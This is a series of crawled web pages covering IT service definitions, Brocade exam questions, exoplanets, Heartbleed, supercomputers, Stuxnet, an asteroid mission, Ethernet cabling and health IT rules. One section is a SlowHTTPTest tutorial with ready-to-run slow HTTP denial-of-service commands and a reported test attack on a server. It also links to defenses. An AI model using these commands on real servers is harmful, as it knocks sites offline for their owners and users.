s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00152-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947235
486
3.0625
3
The Best Way to Define IT Services Lets consider the ubiquitous IT service usually called something akin to email, although it may go by the name Exchange, Outlook, Notes or even Communications Services. Few IT services engender the passion, debate and paralysis of trying to decide if email is a service or not, so its a good example. Be sure to keep in mind the SID three layer model and the easy rules of perception during use and ability to acquire. Such an email service could include either of the optional CFS, both of them, or none of them depending on what your customer chooses. Conversely, the IT service provider (you) might decide to offer all three example CFS as a single bundled CFS called, you guessed it, email. CFS are defined as those IT services a customer may acquire directly from an IT service provider. Customers are aware of and interact with CFS, and one or many CFSs normally underpin or create one or more business processes and products. CFSs consist of RFSs, and RFSs may not be acquired by a customer except as part of a CFS. Consider the ability to send and receive emails, which requires routing and transmission services not available and probably not useful to a customer outside of their incorporation into CFS. For example, the CFS of Email Send and Receive might not operate without the RFS of Domain Name Services (DNS) and perhaps the RFS of Dynamic Host Configuration Protocol (DHCP.) Customers are usually unaware of RFS since they do not acquire or interact with them directly. RFS are usually shared IT services and underpin one to many CFS. RFS, for example DNS or DHCP, consist of one or more IT resources. For example, individual network links, Internet routers, servers, software, support technicians, operating procedures, etc., all combine together as a RFS (perhaps DNS or DHCP in this example), which is not only unavailable directly to the customer, but of which the customer may be totally unaware and unable to use outside of its CFS. RFS create CFS and IT resources create RFS. IT resources consist of all the individual information, technology, capital, accommodation, human and other related components required to produce and support RFS. IT resources underpin RFS, and most IT resources are shared across several and in many cases all RFS. So there you have it. Honestly, this is the simplest and easiest to understand taxonomy for IT service definition I have every seen or used, and I have seen and used quite a few. I think the most elegant, fastest and easiest way to define IT services is without a doubt SID. Using this methodology you should be able to define your services in hours instead of weeks. The beauty of SID is that is over 100 years in the making and has been validated by telephone, operating, cable and other IT service companies the world-over. In summary: I cant tell you why ITIL doesnt reference SID, but I can tell you that SID is simply the best way to define IT services. Check it out, you will come to think so too. Hank Marquis is director of IT Service Management Consulting at Enterprise Management Associates based in Boulder, Colo. Marquis has more than 25 years of hands-on experience in IT operations, management, governance and operational frameworks. Visit his blog and podcasts at www.hankmarquis.info.
<urn:uuid:b7b132f3-165d-4402-a9b1-046dc71ee595>
CC-MAIN-2017-04
http://www.itsmwatch.com/itil/article.php/11700_3722116_2/The-Best-Way-to-Define-IT-Services.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00454-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954779
707
2.625
3
You have been asked to analyze a Fibre Channel address. Which three sections make upthe address? (Choose three.) Connecting two switches with the purpose of merging them into the same fabric isaccomplished through which port type? Which well known address is used by a device to discover other devices in the fabric? You have a server connected to a Brocade 6505 with a Fibre Channel address of 0x271434that is causing problems. To which port on the switch is the server connected? You will be installing 48-port blades into your Brocade DCX Backbone and therefore sharedarea addressing will be used. Which two fields are used to distinguish this value? (Choosetwo.) Which type of port will be initialized on a storage device upon attachment to a switch withsuccessful port initialization? You are connecting a cable between two Gen 5 Brocade 6250 switches, but the switchesare not forming an ISL between them. What is the reason? In the exhibit, If all switches were operating in insistent Domain ID mode, what would be theresult of enabling the ICL ports? What are two characteristics of the Name Server? (Choose two.) Which well known address distributes Registered State Change Notifications (RSCNs) toregistered nodes?
<urn:uuid:6f26e504-d817-4186-9b42-61267dbba252>
CC-MAIN-2017-04
http://www.aiotestking.com/brocade/category/exam-143-425-brocade-certified-fabric-administrator-gen-5/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00575-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943131
267
2.734375
3
Distances in space are usually impossibly large and hard to get a handle on but this week astronomers said as many as six percent of stars known as Red Dwarfs have planets around them in the habitable zone and may only be 13 light years away from Earth. Now 13 light years is still an impressive distance but habitable planets in such proximity arouses more than its share of astrobiology interest. Astronomers at the Harvard-Smithsonian Center for Astrophysics (CfA) who made the discovery said also worth noting is that Red dwarf stars are smaller, cooler, and fainter than the sun. An average red dwarf is only one-third as large and one-thousandth as bright as the sun. Consequently, the not too hot or not too cold habitable zone would be much closer to a cooler star than it is to the sun, the researchers said. "This close-in habitable zone around cooler stars makes planets more vulnerable to the effects of stellar flares and gravitational interactions, complicating our understanding of their likely habitability," said Victoria Meadows, professor at the University of Washington and principal investigator with the NASA Astrobiology Institute. "But, if the planets predicted by this study are indeed found very nearby, then it will make it easier for us to make the challenging observations needed to learn more about them, including whether or not they can or do support life." Using publicly available data from NASA's Kepler space telescope, astronomers at the Harvard-Smithsonian Center for Astrophysics (CfA) estimate that six percent of red dwarf stars in the galaxy have Earth-size planets in the "habitable zone," the range of distances from a star where the surface temperature of an orbiting planet might be suitable for liquid water. Specifically the CfA team looked at 95 planet candidates orbiting 64 red dwarf stars using publically available data obtained by NASA's star-gazing telescope Kepler. Most of these candidates aren't the right size or temperature to be considered Earth-like, as defined by the size relative to Earth and the distance from the host star. However, three candidates are both temperate and smaller than twice the size of Earth the researchers said. The three planetary candidates highlighted in this study are Kepler Object of Interest (KOI) 1422.02, which is 90 percent the size of Earth in a 20-day orbit; KOI-2626.01, 1.4 times the size of Earth in a 38-day orbit; and KOI-854.01, 1.7 times the size of Earth in a 56-day orbit. The three candidates orbit stars with temperatures ranging from 3,400 to 3,500 degrees Kelvin. By comparison, the temperature of the sun is nearly 5,800 degrees Kelvin. The research team went on to say that locating nearby, Earth-like worlds may require a dedicated small space telescope, or a large network of ground-based telescopes. Follow-up studies with instruments like the Giant Magellan Telescope and James Webb Space Telescope could tell us whether any warm, transiting planets have an atmosphere and further probe its chemistry. Such a world would be different from our own. Orbiting so close to its star, the planet would probably be tidally locked. However, that doesn't prohibit life since a reasonably thick atmosphere or deep ocean could transport heat around the planet. And while young red dwarf stars emit strong flares of ultraviolet light, an atmosphere could protect life on the planet's surface. In fact, such stresses could help life to evolve, the researchers said. "You don't need an Earth clone to have life," said Harvard astronomer and lead author Courtney Dressing during a press conference on the study. In related planet news also utilizing NASA's Kepler data, another CfA research group said about 17% of stars have an Earth-sized planet in an orbit closer than Mercury. Since the Milky Way has about 100 billion stars, there are at least 17 billion Earth-sized worlds out there, according to Francois Fressin, of the CfA. The research team found that 50% of all stars have a planet of Earth-size or larger in a close orbit. By adding larger planets detected in wider orbits up to the orbital distance of the Earth, this number increases to 70%. The researchers said Kepler's currently ongoing observations and results from other detection techniques, they have determined that nearly all sun-like stars have planets. Planets closer to their stars are easier to find because they transit more frequently. As more data are gathered, planets in larger orbits will be detected. In particular, Kepler's extended mission will enable the detection of Earth-sized planets at greater distances, including Earth-like orbits in the habitable zone. Check out these other hot stories:
<urn:uuid:11ee24e5-1814-49cd-bf6a-772c46b931b5>
CC-MAIN-2017-04
http://www.networkworld.com/article/2223995/data-center/earth-size--habitable-zone-planets-may-be-closer-than-you-think.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00419-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9352
965
3.9375
4
QMachine is a novel Web service that leverages ordinary browsers to execute distributed workflows. The service has three essential components: an API server, a Web server, and a website. In the video below, project lead Sean Wilkinson from the University of Alabama at Birmingham demonstrates several use cases for this innovative technology, including a real-world example for sequence analysis. Wilkinson explains how an array X of URLs that point to FASTA files (hosted by the National Center for Biotechnology Information) are passed to the remote volunteer workers, which download the files, and in doing so parallelize the bandwidth as well as the computation. Each element is processed separately using a map function, and the result is sent back to the submitter machine’s developer console.
<urn:uuid:611834f5-4e61-4fca-8856-72be29f286b5>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/03/14/qmachine_combines_hpc_with_www/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00143-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915994
155
2.59375
3
a vulnerability that exists in the OpenSSL security software, which is used to create secure connections. Version 1.0.1 of OpenSSL introduced the vulnerability known as heartbleed, and was released on March 14, 2012. Heartbleed was discovered by Neel Mehta, an engineer at Google Security, and a team of security engineers (Riku, Antti and Matti) at Finnish security firm, Codenomicon. A computer that is on a secure connection to a server will send out a request to confirm that the connection is still active. This secure connection (SSL/TSL), is called a “heartbeat.” It includes two things: a payload, and padding. Servers using the protocol do not check to confirm that the packet of data actually matches the size indicated. By automatically detecting, blocking and logging attempted Heartbleed attacks, Blue Coat’s SSL Visibility Appliance provides enterprises with the security assurance they require. So, for example, if a heartbeat was sent with a single byte of data, and claimed to have 30 bytes of data. Rather than confirm that the data was only 1 byte, the server would grab not only that, but the next 29 bytes from memory as well and send it back the user.
<urn:uuid:bb4f4e18-bc70-4efe-9250-c8b166b8072f>
CC-MAIN-2017-04
https://www.bluecoat.com/heartbleed/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00263-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951249
267
3.296875
3
A once mighty supercomputer to be dismantled, sold for parts Question: What happens to aging supercomputers when they are no longer found to be useful? A little while ago I wondered if the United States, faced with a sagging economy, was set to lose the supercomputer race. Soon after the Energy Department captured the top spot in supercomputing with Titan, China announced it would try to regain the lead with Tianhe-2. Oak Ridge National Laboratory’s Titan is capable of sustained computing of 20 petaflops, or 20 thousand trillion calculations per second. It will become an invaluable tool in modeling everything from bomb blasts to climate change. But to go beyond that speed, into the exascale range (1,000 petaflops), will cost billions. We may not have the money for that kind of investment at the moment, which is why I wondered if it’s even something we should pursue. There were lots of comments on that blog, but I just wanted to add one more new piece of information to think about. This week, we heard a cautionary tale from the state of New Mexico, which has spent about $20 million to create and operate Encanto, which was the third fastest computer in the world back in 2008, capable of 127 teraflops. So what’s in store today for the third fastest computer in the world five years ago? It’s going to be chopped up and sold for parts, effectively. The Albuquerque Journal is reporting that the state can’t seem to make any money off the system, which was originally touted as an economic development and research tool, and has repossessed it from the non-profit organization that was running things. Nobody seems interested in buying the system either, probably because of its inability to make money, and the fact that it costs about $1 million per year to maintain. So the state is considering dividing up the system’s computing racks among three universities. The system has 28 racks with 500 processors each, and bidding has already begun for individual components, though the state is still hopeful that a buyer for the complete system can be found. So here we have what looked like a success story at first. Check out how happy officials seemed with Encanto back when it was built with this facility tour video. Now, it’s worse than an albatross around the state’s neck. A financial investigation found that despite the $11 million original price tag and $9 million in continuing costs, the system is now worth a few hundred thousand dollars. One could argue that a state government should never have gotten into the supercomputer business or that Encanto was mismanaged. It could even still prove a success story if somebody figures out something profitable and worthwhile to do with the thing. But it is yet another warning to be cautious in running the supercomputer race. Supercomputers such as Titan are intended as research tools, not profit centers, but some like Encanto were intended to spur economic development. And New Mexico could lose millions. If the next generation of supercomputers are found similarly unsustainable, the costs could be much higher. Old supercomputers don’t die. They don’t fade away. They get sold for parts. Posted by John Breeden II on Jan 08, 2013 at 9:39 AM
<urn:uuid:84a1d05a-70be-4b72-8119-5671741d5110>
CC-MAIN-2017-04
https://gcn.com/blogs/emerging-tech/2013/01/supercomputer-to-be-dismantled-sold-for-parts.aspx?admgarea=TC_EmergingTech
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00153-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965029
694
2.546875
3
The devastation in Japan caused by the recent earthquake and tsunami is truly heart wrenching, especially when one considers how millions of lives can be turned upside down in the matter of a few minutes. In no way is this article intended to draw any attention away from the plight of the people now suffering in the earthquake's aftermath, as our concerns should be for them first and foremost. With that caveat aside, I believe we can use the events that are unfolding in Japan as a learning opportunity regarding the possible consequences of a sophisticated Stuxnet-type attack against SCADA networks at a nuclear facility. Stuxnet is a highly sophisticated designer-virus that wreaks havoc with SCADA systems which provide operational control for critical infrastructure and production networks, such as those used to operate a nuclear power plant. Stuxnet-type viruses are uniquely dangerous because they are capable not only of affecting network computer systems, they can also cause actual physical damage to the equipment the networks control. Specifically, Stuxnet damaged equipment at Iran's Natanz uranium enrichment facility, which reportedly set back the nation's nuclear program several years. From what I understand of the current crisis in Japan, the problems at the nuclear facilities did not stem from the reactors themselves sustaining significant damaged in the earthquake. Instead, the problem with the reactor cores over-heating was caused by a disruption to the power and water supplies that are needed for the cooling systems. The problem was compounded by the destruction of the backup generators for the cooling system pumps in the subsequent tsunami. In the past, the majority of these systems are operated manually or by analog control systems like electro-mechanical relays, but that is changing. A senior member of the technical staff at one of our nation's largest and most prestigious national research laboratories indicated that a significant number of the nuclear facilities in the U.S. have modernized the controls for those auxiliary systems, and are now employing Programmable Logic Controllers (PLCs). According to the source, at least one facility specifically uses Siemens PLCs, the same type attacked by Stuxnet at Natanz in Iran. If both the primary and redundant cooling components at that nuclear facility used PLCs and were hit with a Stuxnet-type attack that was able to cause physical damage to the equipment, we might witness events similar to those which are now playing out in Japan. Granted, a Stuxnet-type attack would not also destroy roads and other infrastructure, or divert emergency response resources to other concerns. But, as far as the problems with cooling the reactor core, the challenges would be inherently similar. I asked Richard Stiennon if he could provide some insight on this hypothetical scenario. Richard is the Chief Research Analyst and founder of IT-Harvest, an independent analyst firm that focuses on IT and network security. Richard is also the author of the thought provoking book Surviving Cyber War, a holder of Gartner's Thought Leadership award, and was named "one of the 50 most powerful people in Networking" by NetworkWorld Magazine. Stiennon confirms that a Stuxnet-type attack could theoretically cause reactor core cooling systems to be disrupted: "Stuxnet targeted high speed rotating machinery controls, most probably the Uranium enrichment centrifuges in Iran. Both electricity generators and water pumps are examples of rotating machinery that are also controlled in industrial systems by PLCs (Programmable Logic Controllers). Communications with industrial control systems, often via SCADA, can be a vector for attack, or as in the case of Stuxnet, malware can be introduced directly by a bad actor. It is not hard to extrapolate that designer-malware could target these systems with the intent to shut them down and cause at the very least the emergency shut down of a nuclear power plant, at the worst, release of a radioactive plume and the permanent disabling of the reactor - as has happened in Japan," Stiennon replied via email. Numerous experts have speculated that a major cyber attack on critical infrastructure would most likely not occur in isolation, but in conjunction with a conventional kinetic attack, which would present a situation even more similar to what we are witnessing in the aftermath the natural disaster that occurred in Japan. If a Stuxnet-like attack could in effect produce serious kinetic damage on the magnitude of disabling of a nuclear facility, or worse, the discharge of radioactive material and the potential for a core meltdown, the notion that such an attack would only occur in conjunction with a traditional military offensive seems to be less likely. Recently, the International Society of Automation announced the formation of a task group to conduct a gap analysis on the ANSI standards governing SCADA security to evaluate how well organizations following the ISA99 standard would have responded to a Stuxnet-type attack. While the ISA study will focus on network responses, perhaps other regulatory entities should begin to study what a successful post-Stuxnet attack environment could actually look like. Evaluation of the challenges Japan is currently facing could provide valuable insight in the event there is ever a successful attack on SCADA systems controlling auxiliary systems at a nuclear facility. "The one lesson to draw from the unfolding crisis is that risk planners have to expand worst case scenarios. While most nuclear power plants are not on faults (with the notable exception of Diablo Canyon in California) they are all subject to mechanical failures induced by malware introduced to their networks. Redundancy and fail safe measures cannot rely on power, computers, or networks. This applies to nuclear power plants as well as data centers, electrical grids, and communication systems," Stiennon concludes.
<urn:uuid:2908b422-a462-46cf-bcc2-ad6fa6e4b287>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/12628-Japans-Nuclear-Crisis-Stuxnet-and-SCADA-Defenses.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00420-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957127
1,159
2.828125
3
One of NASA's plans for the next few years of space exploration has been for astronauts to land on an asteroid as early as 2025 to conduct experiments, return to Earth with samples and take another step toward deep-space travel. The space agency has even picked out an asteroid as a potential target -- 1999 AO10, a small rock (about 23 feet wide) floating around our solar system. Getting a manned mission to and from 1999 AO10 would take about a year. But as I noted yesterday, there are serious concerns about the effects of cosmic radiation on humans in deep space. So what to do? Well, if we can't go to the asteroid, we can always bring the asteroid to us! From New Scientist: Researchers with the Keck Institute for Space Studies in California have confirmed that NASA is mulling over their plan to build a robotic spacecraft to grab a small asteroid and place it in high lunar orbit. The mission would cost about $2.6 billion – slightly more than NASA's Curiosity Mars rover – and could be completed by the 2020s. Here's my favorite part of the plan... The Keck team envisions launching a slow-moving spacecraft, propelled by solar-heated ions, on an Atlas V rocket. The craft would then propel itself out to a target asteroid, probably a small space rock about 7 metres wide. After studying it briefly, the robot would catch the asteroid in a bag measuring about 10 metres by 15 metres and head back towards the moon. Altogether it would take about six to 10 years to deliver the asteroid to lunar orbit. I don't know why, but the idea of putting an asteroid in a bag strikes me as amusing. Not that I have a better suggestion, like a lasso or a giant rucksack or a flatbed trailer. At the very least, let's hope the bag is recyclable. Once the asteroid is locked into orbit around the moon, it will be much easier for astronauts to travel and spend some time there. You can read all 51 pages of the Keck proposal here. It includes lots of fascinating graphics and charts. They've clearly put a lot of thought into this. Now read this:
<urn:uuid:aee5eaa8-8a26-4e4f-9554-f37765c07f0f>
CC-MAIN-2017-04
http://www.itworld.com/article/2714650/hardware/nasa-wants-to-capture-an-asteroid-in-a-bag-and-put-it-in-orbit-around-the-moon--really--a-bag-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00356-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962679
446
3.75
4
With Ethernet systems providing flexible ways of transmitting voice, data and multimedia over integrated networks, Ethernet patch cords are becoming a familiar part of the network. They can be seen in the work areas of office buildings and trail away from the backs of computers to wall plates and other computers. If you follow the trail, you can see them snake along the paths leading from wall plates to patch panels, and then sprout up again from patch panels to meet the nearby hubs or switches. The cable wiring may look simple, but actually how much do you know about the wiring configurations like cable conductors, connector pins and wire patterns, etc. This is what will be discussed in this article. Ethernet patch cords are flexible leads fitted at each end with an 8P8C connector plug for joining two corresponding 8P8C jacks together. 8P8C refers to 8 positions and 8 conductors. In Ethernet systems, 8P8C plugs and their corresponding jacks are commonly referred to as RJ-45 modular connectors. The RJ-45 plug shows the numbering convention for the pins and pin pairs, with the locking tab facing downward. The male plugs and female jacks are held together by a spring-loaded tab, called a hook that keeps them securely in place while in use, but allows them to be easily unplugged when changes are made to a network system or work area. This modularization is accomplished through the eight conducting pins located on the top of RJ-45 plugs, and just inside the tops of RJ-45 jacks, as shown in the above picture. By connecting the ends of the conducting wires in a patch cable to individual pins in its two RJ-45 end-plugs, electronic data can be transferred via an 8-conductor Ethernet cable from one jack to another through its 8 connector pins. The patch cords used in most Ethernet systems are constructed using UTP (unshielded twisted pair) cable. UTP cable consists of 8 insulated copper-core conductors grouped into 4 pairs, with each pair twisted together along the cable’s length. The conductor pairs and individual conductors in UTP cable are represented by a color code that assigns a primary color—blue, orange, green or brown—to each of the 4 twisted pairs. The insulation of a conductor within a pair is either a solid primary color, or white striped with that primary color. In this way, all conductors are identified as members of a specific twisted pair, and as individual members within that pair. The conductor pairs are numbered 1 to 4, with Pair 1 corresponding to the blue pair, Pair 2 to the orange pair, Pair 3 to the green pair, and Pair 4 to the brown pair. Three different cable wiring patterns are described below. Actually, each cable wiring pattern means the pin on one end is connected to which pin on the other end. T568A and T568B are EIA/TIA wiring standards specifying two different RJ-45 pin assignments for the orange and green conductor pairs in twisted pair cables. From the picture below, it can be seen that the differences between the T568A and T568B specifications lie in the swapping of the green and orange wire pairs. The striped green and solid conductors assigned to pin pair (1, 2) in the T568A standard are assigned to pair (3, 6) in a plug or jack wired according to the T568B standard. And the striped orange and solid orange conductors assigned to pin pair (3, 6) in T568A are assigned to pair (1, 2) in T568B. This is a symmetric swapping of stripe-for-stripe and solid-for-solid within the two conductor pairs, and a symmetric swapping of their corresponding pin positions on the RJ-45 connector plug or jack. T568A and T568B are straight-through wiring schemes. Each conductor inside the patch cable connects to the same pin on both modular plug ends. With regard to these two standards, it is important that both ends of the patch cords should be wired according to the same standard. If they aren’t, the cable is a crossover cable, and will not function correctly with most devices. The wiring standard used for the connector ends of a patch cable can be determined by holding the cable with the gold contact pins of the conductor plug up, and the locking tab down as the picture above. Then the wire colors will be visible and the pins will be numbered 1-8 from left to right. Crossover patch cords, also called flipped patch cords, are used to connect a PC directly to another PC, a hub to hub, or switch to switch. The term crossover is used because the send and receive pairs are crossed from one modular plug (end 1) to the other (end 2). From the picture below, you will see that Pin 1 on end 1 goes to Pin 3 on end 2. Pin 2 on end 1 goes to Pin 6 on end 2, ect. Crossover cables are most commonly used to connect two hosts directly. A roll-over patch cord completely reverses the pin configurations between the two modular plugs. Pin 1 on modular plug end 1 connects to pin 8 on modular plug end 2. Pin 2 on modular plug end 1 connects to pin 7 on modular plug end 2, and so on. This kind of patch cords are not used for network connectivity, but used to serve a unique purpose. This article has introduced the RJ-45 connectors, UTP cabling and the wire patterns in Ethernet systems. When you plan to build your own Ethernet network, you shall to make clear all these configurations. Hope the information mentioned in this article can be a guide when needed.
<urn:uuid:006f1005-ad31-4d6a-a3c0-d554b43f2490>
CC-MAIN-2017-04
http://www.fs.com/blog/things-you-should-know-about-ethernet-system.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92193
1,164
3.328125
3
SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin – a Unix-like environment and command-line interface for Microsoft Windows. It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server. Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server. Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly. Installation for Kali Linux users For Kali Linux users, install via apt-get .. (life is good!) root@kali:~# apt-get install slowhttptest Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: slowhttptest 0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded. Need to get 29.6 kB of archives. After this operation, 98.3 kB of additional disk space will be used. Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB] Fetched 29.6 kB in 1s (21.8 kB/s) Selecting previously unselected package slowhttptest. (Reading database ... 376593 files and directories currently installed.) Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ... Processing triggers for man-db ... Setting up slowhttptest (1.6-1kali1) ... root@kali:~# For other Linux distributions The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install: $ tar -xzvf slowhttptest-x.x.tar.gz $ cd slowhttptest-x.x $ ./configure --prefix=PREFIX $ make $ sudo make install Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed. You need libssl-dev to be installed to successfully compile the tool. Most systems would have it. Mac OS X brew update && brew install slowhttptest Try your favorite package manager, some of them are aware of slowhttptest (Like Kali Linux). slowhttptest is a great tool as it allows you to do many things. Following are few usages Example of usage in slow message body mode slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3 Same test with graph slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3 Example of usage in slowloris mode slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3 Same test with graph slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3 Example of usage in slow read mode with probing through proxy Here x.x.x.x:8080 proxy used to have website availability from IP different than yours: slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080 Depends on verbosity level, output can be either as simple as heartbeat message generated every 5 seconds showing status of connections with verbosity level 1, or full traffic dump with verbosity level 4. -g option would generate both CSV file and interactive HTML based on Google Chart Tools. Here is a sample screenshot of generated HTML page that contains graphically represented connections states and server availability intervals, and gives the picture on how particular server behaves under specific load within given time frame. CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs. Last message you’ll see is the exit status that hints for possible possible program termination reasons: |“Hit test time limit”||program reached the time limit specified with -l argument| |“No open connections left”||peer closed all connections| |“Cannot establish connection”||no connections were established during first N seconds of the test, where N is either value of -i argument, or 10, if not specified. This would happen if there is no route to host or remote peer is down| |“Connection refused”||remote peer doesn’t accept connections (from you only? Use proxy to probe) on specified port| |“Cancelled by user”||you pressed Ctrl-C or sent SIGINT in some other way| |“Unexpected error”||should never happen| Sample output for a real test I’ve done this test in a sample server and this is what I’ve seen from both attacking and victim end. From attackers end So, I am collection stats and attacking www.localhost.com with 1000 connections. root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3 Tue Sep 23 11:22:57 2014: slowhttptest version 1.6 - https://code.google.com/p/slowhttptest/ - test type: SLOW BODY number of connections: 1000 URL: http://www.localhost.com/ verb: FAKEVERB Content-Length header value: 8192 follow up data max size: 22 interval between follow up data: 110 seconds connections per seconds: 200 probe connection timeout: 3 seconds test duration: 240 seconds using proxy: no proxy Tue Sep 23 11:22:57 2014: slow HTTP test status on 85th second: initializing: 0 pending: 23 connected: 133 error: 0 closed: 844 service available: YES ^CTue Sep 23 11:22:58 2014: Test ended on 86th second Exit status: Cancelled by user CSV report saved to my_body_stats.csv HTML report saved to my_body_stats.html From victim server end: rootuser@localhost [/home]# pgrep httpd | wc -l 151 Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!) And of course I want to see how what’s in my rootuser@someserver [/var/log]# tail -100 message | grep Firewall Sep 23 11:43:39 someserver: IP 18.104.22.168 (XX/Anonymous/1-2-3-4) found to have 504 connections As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure). Further reading and references - Slowhttptest in Google - How I knocked down 30 servers using slowhttptest - Slow Read DoS attack explained - Test results of popular HTTP servers - How to protect against slow HTTP DoS attacks To make it worse, you can do it from Windows, Linux and even a Mac. If you can run multiple DoS tools such as GoldenEye , hping3 on a single web server, then it is very easy to knock it down. There are strategies to defend against such attacks (see #5 on Further reading and references list), but for a small server where resource is limited and run by non IT people (bloggers etc.) it quickly becomes a nightmare. Thanks for reading, please share and RT.
<urn:uuid:487f5c9f-3d28-4f01-a147-a9cf4fa8030f>
CC-MAIN-2017-04
https://www.blackmoreops.com/2015/06/07/attack-website-using-slowhttptest-in-kali-linux/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00200-ip-10-171-10-70.ec2.internal.warc.gz
en
0.81983
1,946
2.578125
3
Choosing the Cluster Type that's Right For You - Page 3 Server clusters, like most other things in Windows 2000, are modular in nature. They are made up of nodes, groups, and resources. As you might expect, a node is simply a server that is a part of the cluster. A group is a unit of fail over. Each group contains a collection of resources, or objects that can be brought online or taken offline. A group is owned by a node, and all resources within a group run on the same node that owns the group. If any one resource within a group fails, all resources in the group will be temporarily moved to a different node until the cause of failure is resolved. You might wonder how Windows 2000 knows how and when to move groups between nodes. It does so using something called the Quorum Resource. The Quorum Resource exists on an NTFS partition within the shared hard disk array. It is basically a collection of all the cluster's configuration information, fail-over policies, and recovery logs. Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all.
<urn:uuid:c5661281-75b1-4481-a9c5-330c6236cc4f>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/netsysm/article.php/10954_624381_3/Choosing-the-Cluster-Type-thats-Right-For-You.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00502-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949903
291
2.71875
3
The regulation of health IT was always bound to unspool slowly, given the involvement of multiple agencies with overlapping jurisdiction and a rapidly changing and important industry. The first piece of finalized health IT regulation, which laid out rules for mobile applications, was released Sept. 23 following two years of debate. The government is required to outline its plans for the rest of the sector by January. Health IT has the potential to lower costs and improve productivity in the health care sector, which has recently stagnated. New developments in health IT could make doctors' tasks more efficient or replace them entirely, a shift that would square with Obamacare's incentives for providers to deliver quality care at a lower cost. Three agencies are charged with regulating the sector: the Food and Drug Administration, which will approve some apps and software and oversee the use of IT in clinical practice; the Federal Communications Commission, which manages wireless spectrum; and the Office of the National Coordinator for Health Information Technology, which oversees electronic medical records. The agencies have indicated they will take a flexible approach to health IT regulation in the hopes of encouraging innovation. The FDA said on Sept. 23 that it will largely waive enforcement for apps with non-dangerous functions: those that transmit information from a patient's electronic health record; help manage a health condition without offering patient-specific advice, such as offering general diet tips for a diabetic; or provide simple calculations, like body-mass index. The agency will be more strict with apps that control or mimic regulated medical devices, such as an app that can show electrocardiograms, and apps that provide patient-specific analyses or diagnoses—for example, an app that takes pictures of skin moles and determines whether they are likely benign or malignant. The FDA may require premarket clearance or approval for these. The regulations issued in September left the some questions unanswered; the agency still hasn't decided how to regulate software that helps doctors make treatment choices. And the decisions it has made don't cover the entire sector, which also includes software that controls medical devices or electronic health records. That's where the other agencies come in. A 2011 law, the FDA Safety 